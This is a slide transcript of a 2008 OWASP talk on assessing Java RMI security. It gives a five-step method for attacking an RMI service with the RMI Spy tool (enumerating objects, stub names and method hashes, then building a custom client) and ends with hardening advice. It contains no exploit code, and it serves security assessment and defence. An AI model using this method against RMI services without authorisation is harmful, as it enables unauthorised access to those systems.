Download Media:Adam Boulton Security Assessing Java RMI

Survey
yes no Was this document useful for you?
   Thank you for your participation!

* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project

page
1
page
2
page
3
page
4
page
5
page
6
page
7
page
8
page
9
page
10
page
11
page
12
page
13
page
14
page
15
page
16
page
17
page
18
page
19
page
20
page
21
page
22
page
23
page
24
page
25
page
26
Document related concepts
no text concepts found
Transcript 
Security Assessing Java RMI
OWASP
Adam Boulton
OWASP Contributor
Corsaire
Adam.Boulton@corsaire.com
+44 1483 746700
24th Sept 2008
Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
http://www.owasp.org
Profile
Principal Security Consultant at Corsaire
Anti-Virus Analyst for Sophos Plc
Ministry of Defence (Level 1 Security Clearance)
BSc 1st Class (Hons) Software Engineering
Big Java Fan – check out OWASP Java Gotchas!
OWASP
2
Agenda
What is Remote Method Invocation (RMI)?
RMI Architecture
Attacking an RMI service with RMI Spy
Securing RMI services
OWASP
3
What is RMI?
Distributed computing solution
All about remote objects
Part of core JDK platform since 1.1
java.rmi package
Not familiar? Think….
Microsoft .NET Remoting
RPC
CORBA
OWASP
4
What is RMI?
Communicating between 2 JVMs over a network
Export functionality at the object level
Remote clients deal with objects as if they were local
RMI uses object serialization
Your custom classes must implement the serializable
interface so they can be distributed
Primitives are just sent by value
OWASP
5
What is RMI?
Transparent solution
All underlying network functionality
RMI Specification states:
 “Make writing reliable distributed applications as simple as
possible”
Increases risk that services are implemented
insecurely
 Security through obscurity
OWASP
6
RMI Architecture
Client (Interface)
Server (Implementation)
Object
Object
JRMP
TCP/IP
OWASP
7
RMI Registry
Used for looking up Objects
Servers register their Objects
Clients use to find and obtain remote references
Runs on port 1099 by default
OWASP
8
RMI tools
RMIC (rmic.exe)
Special compiler that creates stub and skeleton
Registry
Created by:
 Rmiregistry.exe <port no>
– Or
 LocateRegistry.createRegistry(int portNo)
OWASP
9
The Interface / Method Hash
64 bit hash (SHA1)
Method name + method descriptor used as
message
Example:
void myRemoteMethod(int i, Object o, boolean b)
 myRemoteMethod(ILjava/lang/Object;Z)V
– 0xB7B6B5B4B3B2B1B0
OWASP
10
Hash weakness
An attacker can pre-calculate hashes if they
know API details
64-bit
Brute-force
Rainbow tables
Due to the implementation it doesn’t even
appear to actually be 64 bits!
Still doing the analysis
OWASP
11
RMI server secrets...
An attacker’s shopping list:
Bound object names
Stub name
A static signed 64 bit key(s)
Method prototypes (interface)
The ability to code a client!
OWASP
12
Today’s RMI service...
Only hosting 3 methods
Let’s attack it.... LIVE!
OWASP
13
Methodology for a 0-day RMI assessment
Step 1 – Enumerate bound object names
Step 2 – Determine stub name
Step 3 – Enumerate method hashes
Step 4 – Determine method prototypes
Step 5 – Create stub
OWASP
14
Step 1 – Enumerate bound objects
Use your own scanning tools to detect an RMI
service
Identify objects which are bound to the port that
we can talk to
Easily done using the java.rmi package
OWASP
15
Step 2 – Determine stub name
Correct stub name is required so we can talk to
the RMI service
Use RMISpyStubName to establish the correct
stub name
Rename the template
OWASP
16
Step 3 – Enumerate key / method hashes
The hashes are calculated by using method
descriptors
The signed 64-bit value
Remember, only 1 hash for v1.1
Add the hash to the template
Hashes can be pre-calculated
OWASP
17
Step 4 – Determine method prototypes
First establish the parameter types
Bit more manual work
Secondly, establish the return type
Object is our friend
Method names are irrelevant
All about the 64-bit signed value
OWASP
18
Step 5 – Creating the stub
Detail has been added at each stage, we now
have enough for a fully working custom client!
The service is now ready to finger print in more
detail.
By using the business logic layer we can
determine LOTS more detail.
Can rely on the Developer getting it wrong to
establish more detail.
OWASP
19
Why is RMI insecure?
Building on an insecure foundation
Skeleton implementation is flawed
False sense of security
Security through obscurity
Keys are insufficient
Chances are you won’t notice an attacker until a
correct client has been constructed
OWASP
20
Securing an RMI Server
Adapt the RMI server code
Stop information leakage
 Sun should have read the OWASP top 10!
Modify the method hashes
Java Authentication and Authorization Service (JAAS)
Be careful what you expose!
Just because you don’t release a client with the
functionality doesn’t mean attackers can’t see it!
Don’t expose the server object directly
Don’t rely on security through obscurity
OWASP
21
Securing and RMI Server (Cont...)
Logging
Invoke from command line:
 java -Djava.rmi.server.logCalls=true YourServerImp
Or enable inside program
 RemoteServer.setLog(System.err);
OWASP
22
Further Developments of RMI Spy
Fully automated
Integrating the 5 stages into a click and run
GUI
Automated interface and stub creation
Packet Sniffer
RMI Call parser
 Pull keys from the wire
 Pull objects from the wire and assess
 Modify objects on the fly
OWASP
23
Further Developments of RMI Spy (cont...)
Code tidy!
Hash generator
Dynamic Invocation
Fuzzing
Exception handler (what is the server telling us)
Multi-threading
Hash attack (possible C++ and packet)
OWASP
24
Summary
RMI Architecture
Why RMI is insecure
Comment in the generated code says “do not edit”.
We all know differently now.
Security is difficult; even Sun don’t always get it right!
RMI Spy
Only tool in (known) existence to attack RMI services
How to secure RMI
OWASP
25
Questions
OWASP
26
Related documents
Accelerating the Clean Energy Revolution Corporations and other
Accelerating the Clean Energy Revolution Corporations and other
Advanced SQL Injection - Victor Chapela
Advanced SQL Injection - Victor Chapela
View Report - PDF
View Report - PDF
Distributed Java Communications
Distributed Java Communications
Do`s and Don`ts for web application developers
Do`s and Don`ts for web application developers
OWASP Education Project
OWASP Education Project
Remote Method Invocation (RMI)
Remote Method Invocation (RMI)
RMI (Powerpoint)
RMI (Powerpoint)
Client Virtual Machine
Client Virtual Machine
Passing Remote Objects: Example
Passing Remote Objects: Example
Remote Method Invocation (RMI)
Remote Method Invocation (RMI)
15.Distribute Objects
15.Distribute Objects